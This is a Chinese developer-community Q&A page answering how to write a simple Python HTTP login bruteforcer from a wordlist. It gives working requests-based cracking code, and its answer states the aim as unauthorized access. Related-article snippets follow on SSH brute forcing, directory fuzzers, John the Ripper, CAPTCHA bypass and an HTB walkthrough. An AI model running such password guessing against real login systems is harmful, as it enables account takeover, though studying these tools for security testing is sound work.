开发者社区

文档建议反馈控制台

最新优惠活动

文章/答案/技术大牛

发布

用python编写一个简单的http登录bruteforcer，在读取wordlist时获得不同的行为。

HTTP登录bruteforcer是一种用于暴力破解HTTP登录凭据的工具。它通过尝试不同的用户名和密码组合来破解登录系统，以获取未经授权访问的权限。下面是一个用Python编写的简单HTTP登录bruteforcer的示例代码：

import requests

def bruteforce_login(url, username, wordlist):
    with open(wordlist, 'r') as f:
        for line in f:
            password = line.strip()
            response = requests.post(url, data={'username': username, 'password': password})
            if response.status_code == 200:
                print(f"Login successful - Username: {username}, Password: {password}")
                return
    print("Login failed")

url = 'http://example.com/login'  # 替换为目标登录页面的URL
username = 'admin'  # 替换为目标登录页面的用户名
wordlist = 'passwords.txt'  # 替换为包含密码列表的文件路径

bruteforce_login(url, username, wordlist)

这个简单的HTTP登录bruteforcer使用了Python的requests库来发送POST请求，并通过循环遍历密码列表中的每个密码进行尝试。如果登录成功（HTTP响应状态码为200），则打印出成功的用户名和密码，并结束程序。如果所有密码都尝试完毕后仍未成功登录，则打印出登录失败的消息。

在这个例子中，我们需要提供目标登录页面的URL、用户名和包含密码列表的文件路径。你可以根据实际情况进行替换。

关于读取wordlist时获得不同的行为，你可以进一步说明你希望实现的具体行为，例如按行顺序读取、随机读取、循环读取等。根据不同的需求，可以使用不同的方法来实现。

页面内容是否对你有帮助？

有帮助

没帮助

相关·内容

用Python编写一个简单的Http S

原文地址：Write a simple HTTP server in Python http://www.acmesystems.it/python_httpd 例子中源码： https:/.../github.com/tanzilli/playground/tree/master/python/httpserver 用Python编写一个简单的Http Server Python内置了支持HTTP...让我们来看第一个基本例子，在浏览器上输出”Hello World ” example1.py #!...打开请求的文件发送给浏览器输入如下命令运行它: python example2.py 然后用你的浏览器打开 http://your_ip:8080 一个首页会出现在你的浏览器上 Read...example3.py 在 “Your name” 标签旁边输入你的名字

3K1 0

Urlbuster：一款支持爆破的可变异Web目录模糊测试工具

自定义HTTP头修改POST，PUT和PATCHPayload 使用不同的请求方法进行变异使用不同的HTTP头进行变异使用不同的文件扩展名进行变异使用斜杠进行变异枚举GET参数值工具安装...广大研究人员在配置好Python和pip环境之后，可以直接使用下列命令安装Urlbuster： pip install urlbuster 工具使用 usage: urlbuster [options]...-w /-W BASE_URL urlbuster -V, --help urlbuster -h, --version URL bruteforcer...https://example.com:10000/ 变异样例对于某些网站来说，在使用某些特殊用户代理的情况下，即使调用的是相同的路径，Web应用程序的反应和行为也会不同。...-439d855feabf' \ http://www.domain.tld/ 查找文件查找站点根目录中的文件： $ urlbuster \ -W /path/to/wordlist.txt

9972 0

BruteLoops：协议无关的在线密码安全检测API

BruteLoops针对身份验证接口提供了密码爆破猜解功能，代码库中提供了一个模块化的使用示例，并演示了如何使用BruteLoops来实现密码安全解析。...它的功能非常齐全，并且提供了多个爆破模块，下面给出的是其功能示例： · http.accellion_ftp FTP HTTP接口登录加速模块 · http.basic_digest 通用HTTP...登录Web接口 · http.netwrix Netwrix登录Web接口 · http.okta Okta JSON API · http.owa2010...· 日志记录工具依赖 BruteLoops工具要求Python 3.7或更高版本的Python环境，以及SQLAlchemy 1.3.0，后者可以通过pip工具以及该项目提供的requirements.txt...在使用该工具时，我们可以按照以下步骤来对密码安全测试进行拆分： · 寻找一个需要测试的目标服务； · 如果py1中没有存在该目标，则需要构建一个回调； · 搜索某些用户名、密码和凭证信息； · 通过向

1.1K3 0

如何针对 SSH 服务的暴力破解

Python 版 SSH-Brute-Forcer(python 2) 项目地址： git clone https://github.com/d3vilbug/Brutal_SSH 使用之前需要安装一个库...PowerShell 版 SSH-PuTTY-login-bruteforcer 验证 SSH 账户密码使用第三方工具 putty 或者 plink，在企业内部，这两款 SSH 连接工具是管理员最常用的...，对于我们在企业内网进行 SSH 暴力破解时，如果有防护软件之类的，可以用这种方式来规避。.../sshgobrute 代码很简单，方便大家学习扩展，编写属于自己的小工具，查看帮助： ?...生成有关系的密码字典，说不定有成功突破的机会，但是在企业内部网络，测试开发机非常多，开发测试运维人员，每日工作多次登录系统，或者认为测试机无关紧要，所以会将密码设置的比较简单，也是认为内网不会有人攻击，

1.4K5 0

网站扫描与Fuzz测试之敏感信息收集

| PentestBox 描述:Python开源CMS扫描,自动检测安全漏洞的过程中最受欢迎的CMS，CMSmap的主要目的是为不同类型的cms集成常见漏洞在一个单一的工具。...简单粗暴的功能特点记录：模块化框架可编写插件接口可处理BurpSuite所抓的请求和响应报文基础入门 Usage: wfuzz [options] -z payload,params <url...显示或隐藏符合指定filter表达式的返回结果 (用 BBB 来接收 baseline) --prefilter : 用指定的filter表达式在测试之前过滤某些测试条目...stdin | 获得从标准输入中的条目 list | 获得一个列表中的每一个元素...permutation | 获得一个在指定charset和length时的字符组合 buffer_overflow | 获得一个包含指定个数个

2K3 0

网站扫描与Fuzz测试之敏感信息收集

WeiyiGeek. (2)CMSmap | PentestBox 描述:Python开源CMS扫描,自动检测安全漏洞的过程中最受欢迎的CMS，CMSmap的主要目的是为不同类型的cms集成常见漏洞在一个单一的工具...简单粗暴的功能特点记录：模块化框架可编写插件接口可处理BurpSuite所抓的请求和响应报文基础入门 Usage: wfuzz [options] -z payload,params <url...显示或隐藏符合指定filter表达式的返回结果 (用 BBB 来接收 baseline) --prefilter : 用指定的filter表达式在测试之前过滤某些测试条目...stdin | 获得从标准输入中的条目 list | 获得一个列表中的每一个元素...permutation | 获得一个在指定charset和length时的字符组合 buffer_overflow | 获得一个包含指定个数个

3.6K1 0

初探密码破解工具JTR

JTR是John The Ripper的缩写本身是用来专门破解linux系统用户hash的,但现在已经不再那么局限了,它同样也提供了非常多的散列类型,虽然,跟hashcat在某些方面确实还差了一个量级,...在运行期间会在当前目录产生一个john.pot文件,用来缓存破解时的数据,主要是用来记录破解进度什么的,如果你每次想从头开始破解,直接把这个文件手工删除,然后重新跑即可 rm -fr john.pot...的hash,可以用逗号分隔多个shell程序 --format 指定要破解的hash所对应的加密类型,可以不用手工指定,john会自动识别 --stdout 从标准重定中接收指定字符关于不同破解模式的官方介绍...只破解特定shell类型的用户hash,如果用户实在比较多,我们只需要破解那些可以登录到系统中的用户就好了,伪用户可以暂时不用管: ./john --wordlist=....破解 postgresql 数据库用户hash 如果特意指定散列类型貌似不太好使,让它自动识别就好了,不知道今天什么情况,之前在centos7中用一直都没问题的呀 john --wordlist=weakpass.txt

3.2K0 0

Web安全的最后一道防线：细谈Gobuster的目录文件VhostDNS子域名暴力破解艺术

一、前言Gobuster是一款用go语言编写的对于网站目录/文件、DNS子域、虚拟主机vhost进行暴力穷举的开源工具，常用于安全领域，其常用的暴力破解模式到目前为止（3.6版本）有如下几种：图片模式...--wordlist-offset int从字典的指定位置继续（默认偏移量为0，从第一个开始）。...2.使用cookies（-c|--cookies）gobuster dir -u -w -c 图片相当于拿到登录状态信息，再去枚举URL下的目录和文件。...（-X）当要搜索的扩展名有多个时，可以通过读取扩展名的文件，不需要一个个手动指定：gobuster dir -u -X -w 图片9....同时也通过抓包分析了不同场景的参数选择上的差异和行为。

8.3K74 40

一款能模糊的地方都能模糊的测试工具——Wfuzz

wfuzz是一个完全模块化的框架，这使得即使是Python初学者也能够进行开发和贡献代码。开发一个wfuzz插件是一件非常简单的事，通常只需几分钟。...wfuzz是用python开发的针对web的模糊测试工具，该工具实现功能相当于burp的爆破模块，可以自定义指定参数进行爆破测试。.../wfuzz/wordlist/general/common.txt http://testphp.vulnweb.com/FUZZ stdin 这个payload可以在使用一些外部字典生成工具时很方便.../FUZZ/FUZ2ZFUZ3Z 过滤器对wfuzz的结果时行过滤是非常重要的：非常大的字典文件可以生成非常庞大的输出，并且把我们想要的结果淹没对HTTP响应的一些分类在实际攻击时是非常重要的，...| 获得一个在指定charset和length时的字符组合 buffer_overflow | 获得一个包含指定个数个A的字符串. hexrange | 获得指定范围内的每一个hex值 iprange

1K3 0

JavaWeb实验报告2-简易选课系统-编写一个Java Web项目，实现依据Cookie自动登录，登录后可以进行课程的简单选课和退课。在第一次登录页面时，需要输入用户名和密码，并可选择一周内不用登录

目录: 写在开头: 首先上动图: 然后是大家喜欢的图片截图: 给大家推荐我自己录制速成课程哈: ---- By CaesarChang 写在开头: 现在是: 2021-4-9 22:50...在这个项目里面因为没让用SpringMVC的框架,所以这次写了很多个Servlet,如果有框架,我们可以只写一个Servlet就好了. 但凡有点小难度的我都会开源哈! 关注我吧!...---- 然后是大家喜欢的图片截图: ? ? ? ?...import javax.servlet.ServletException; import javax.servlet.annotation.WebServlet; import javax.servlet.http.Cookie...; import javax.servlet.http.HttpServlet; import javax.servlet.http.HttpServletRequest; import javax.servlet.http.HttpServletResponse

1.1K7 0

专为渗透测试人员设计的 Python 工具大合集

如果你对漏洞挖掘、逆向工程分析或渗透测试感兴趣的话，我第一个要推荐给你的就是Python编程语言。Python不仅语法简单上手容易，而且它还有大量功能强大的库和程序可供我们使用。...在这篇文章中，我们会给大家介绍其中的部分工具。注：本文罗列出来的工具绝大部分都是采用Python编写的，其中有一小部分还使用了C语言库。...：一款挖洞插件 lIDAPython：IDA Pro插件，整合了Python编程语言，并支持在IDA Pro中运行脚本 lPyEMU：支持脚本的完整IA-32模拟器，用于恶意软件分析 lpefile：读取并操作...设计的一款简单的模糊测试工具 lFusil：编写模糊测试程序的代码库 Web lRequests：一个简单友好的HTTP库 lHTTPie：有好的类cURL命令行HTTP客户端 lProxMon：处理代理日志...（Wordlist）的命令行工具/代码库其他有用的库和工具 lIPython：多功能增强型交互式Python Shell lBeautiful Soup：爬虫可能会用到的HTML解析器 lMayavi

1.3K8 0

突破封闭 Web 系统的技巧之正面冲锋

在互联网安全服务公司乙方工作的人或者进行 SRC 众测等相关渗透测试时，经常碰到客户只给一个 "xxx信息管理系统"、"xxx平台"之类的一个 Web 登录界面的系统的链接地址，其它全凭自己造化，去找漏洞吧...图形验证码不刷新或无效手工尝试一次登录后，在某一时间段内无论登录失败多少次，只要不刷新页面 Session 不过期，就可以无限次的使用同一个验证码来对一个或多个用户帐号进行暴力猜解;登录失败之后，系统会打开一个新页面或者弹出一个新的警告窗口...简单验证码识别在平常的漏洞挖掘过程中，如果我们发现登录的验证码非常简单且易于识别，那我们就可以尝试使用自动化工具来进行登录破解了，如 PKAV 的 HTTP Fuzzer、python 调用 tesseract-ocr...，突破的主要思路有：1.短信验证码生命期限内可暴力枚举在验证码还未过期的时间段内，可枚举全部的纯四位数字、六位数字等较简单的短信验证码；2....除此之外，还有三种较为通用的绕过方法：如果 Web 系统实现不当，可枚举所有的6位数字，有几率可以成功登录系统当双因子认证保护的Web系统开放密码重置功能时，可以尝试去重置密码，重置成功后获得的Session

1.6K11 1

【HTB】OpenAdmin

作为密码，使用 Jimmy 作为用户名 ssh 登录成功可以看到 main.php 他会输出 joanna 的 .ssh 的 id_rsa 但是当我们去 curl 的时候没有输出，可能并不是在默认的...-l 仅列出有在 Listen (监听) 的服务状态 -p 显示建立相关链接的程序名 -r 显示路由信息，路由表 -e 显示扩展信息，例如uid等 -s 按各个协议进行统计 -c 每隔一个固定时间，执行该...netstat命令猜测运行在 52846 上，所以 curl http://127.0.0.1:52846/main.php 把这个密钥保存出来：然后使用： python /usr/share/john...=/usr/share/wordlists/rockyou.txt sshjohn 使用 john 爆破 --wordlist 指定字典然而这一个并不是 ssh 连接的密码，而是使用密钥进行登录时的密码.../root/root.txt 的内容成功读取：第一次做专门选了个评价是最简单的那种然而还是搞懵了

7714 0

web攻击

书是比较老了，anyway，还是本很好的书本篇是第5章web攻击，包括urllib2库，安装应用，破解目录，破解html表格认证 1、urllib2 编写与web服务交互的工具需要urllib2 下面简单看看如何创建一个...print "Spawning thread %d" % i t = threading.Thread(target=test_remote) t.start() 3、破解目录和文件位置一个简单的目录爆破.../all.txt" #这个字典可参考SVNDigger或DirBuster resume = None #作者说用于网络中断时，延续上一个尝试的字符串，而不用从头开始，这里好像没用到 user_agent...Joomla的例子在提交密码前检索token 利用urllib2建立session时设置cookie Joomla的管理员表单 #!...() 结语主要是学习web交互时的一些攻击，利用urllib2 但是由于本书较老，现在已经是urllib3了，对应HTTP1.1 所以实际应用时需要做相应修改 ---- 红客突击队于2019年由队长

6521 0

专为渗透测试人员设计的Python工具大合集

如果你对漏洞挖掘、逆向工程分析或渗透测试感兴趣的话，我第一个要推荐给你的就是Python编程语言。Python不仅语法简单上手容易，而且它还有大量功能强大的库和程序可供我们使用。...在这篇文章中，我们会给大家介绍其中的部分工具。注：本文罗列出来的工具绝大部分都是采用Python编写的，其中有一小部分还使用了C语言库。...l IDAPython ：IDA Pro插件，整合了Python编程语言，并支持在IDA Pro中运行脚本 l PyEMU ：支持脚本的完整IA-32模拟器，用于恶意软件分析 l pefile ：读取并操作...设计的一款简单的模糊测试工具 l Fusil ：编写模糊测试程序的代码库 Web l Requests ：一个简单友好的HTTP库 l HTTPie ：有好的类cURL命令行HTTP客户端 l...l Pandas ：可提供高性能数据结构的数据分析工具 l pyparsing ：通用解析模块 l lxml ：采用Python编写的功能丰富且易于使用的XML和HTML工具 l Whoosh ：纯Python

1.5K7 0

突破封闭 Web 系统的技巧之正面冲锋

在互联网安全服务公司乙方工作的人或者进行 SRC 众测等相关渗透测试时，经常碰到客户只给一个 "xxx信息管理系统"、"xxx平台"之类的一个 Web 登录界面的系统的链接地址，其它全凭自己造化，去找漏洞吧...Web 系统进行密码猜解，大部分人喜欢叫密码爆破，因为猜解一个人的密码，通常需要成千上万条的密码来尝试。密码猜解的目的是准确、高效的获得已知用户的正确密码。...图形验证码不刷新或无效手工尝试一次登录后，在某一时间段内无论登录失败多少次，只要不刷新页面 Session 不过期，就可以无限次的使用同一个验证码来对一个或多个用户帐号进行暴力猜解; 登录失败之后，系统会打开一个新页面或者弹出一个新的警告窗口...简单验证码识别在平常的漏洞挖掘过程中，如果我们发现登录的验证码非常简单且易于识别，那我们就可以尝试使用自动化工具来进行登录破解了，如 PKAV 的 HTTP Fuzzer、python 调用 tesseract-ocr...，突破的主要思路有： 1.短信验证码生命期限内可暴力枚举在验证码还未过期的时间段内，可枚举全部的纯四位数字、六位数字等较简单的短信验证码； 2.

1.2K0 0

扩展burp代理

---- 扩展burp代理前言《Python黑帽子：黑客与渗透测试编程之道》的读书笔记，会包括书中源码，并自己将其中一些改写成Python3版本。...，创建一个简单的fuzz工具 #!.../usr/bin/env python #-*- coding:utf8 -*- # 导入三个类，其中IBurpExtender类是编写扩展工具必须的类，后两个是Intruder的，我们就是要扩展它...，因为是字典，不能重复最好，所以用集合 self.wordlist = set(["password"]) # 建立起我们的扩展工具 callbacks.setExtensionName..., http_response): headers, body = http_response.tostring().split("\r\n\r\n", 1) # 忽略下一个请求

3211 0

dirsearch安装和使用

目录 dirsearch介绍下载及安装如何使用简单用法递归扫描线程前缀/后缀黑名单筛选器原始请求 Wordlist格式排除扩展扫描子目录代理报告其他命令小贴士选项选项...强制性字典设置一般设置请求设置连接设置配置 dirsearch介绍 dirsearch是一个基于python3的命令行工具，常用于暴力扫描页面结构，包括网页中的目录和文件。...`–Skip-on-Status 429`将帮助您在返回429时跳过目标 -服务器包含会减慢扫描速度的大文件？...将自定义后缀添加到所有wordlist条目，忽略目录（用逗号分隔） --only-selected 移除路径的扩展名与选定的不同通过`-...--full-url 输出中的完整URL（在安静模式） --no-color 无彩色无彩色输出请求设置 -m METHOD, --http-method

5.5K2 1

【Python】利用python爬取微信朋友info

#前言今天在工作室学习时，偶然被某公众号推送了《我用python爬了爬自己的微信朋友》，因为本身也是在学习python的过程，索性就中断了手头的工作，点进去看，并操作了一番，学习了itchat模块，...，会弹出登录二维码，用微信扫描登录 itchat.auto_login() #关于所有微信还有的资料信息都封装在这个方法里 friends = itchat.get_friends(update=...i in pics: try: #打开图片 img = Image.open(user + "/" + i) except IOError: print("Error: 没有找到文件或读取文件失败..." ".join(wordlist) #画图 coloring = plt.imread('....itchat开发文档：http://itchat.readthedocs.io/zh/latest/

6641 0

dirsearch----目录扫描工具

简介对网站渗透时，目录扫描应该是最重要的手段之一吧。目录扫描的工具有很多，如御剑、diebuster、wwwscan、dirsearch等等。...dirsearch是一款非常简洁高效的扫描工具，使用python3编写，只要系统安装了python3就可以使用，无须安装等繁琐操作。在kali系统中可以使用 apt 工具直接下载到系统中。...下载的需要安装python依赖包，在工具目录下使用命令 pip install -r requirements.txt 。...参数详解此处内容回复可见简单使用 python3 dirsearch.py -u "https://example.com" 扫描https://example.com网站 python3 dirsearch.py..." -w /wordlist 指定字典 python3 dirsearch.py -e php -u "https://example.com" --prefixes .

2.6K2 0

点击加载更多

扫码

添加站长进交流群

领取专属 10元无门槛券

手把手带您无忧上云

扫码加入开发者社群

相关资讯

热门标签

活动推荐

运营活动

活动名称

广告关闭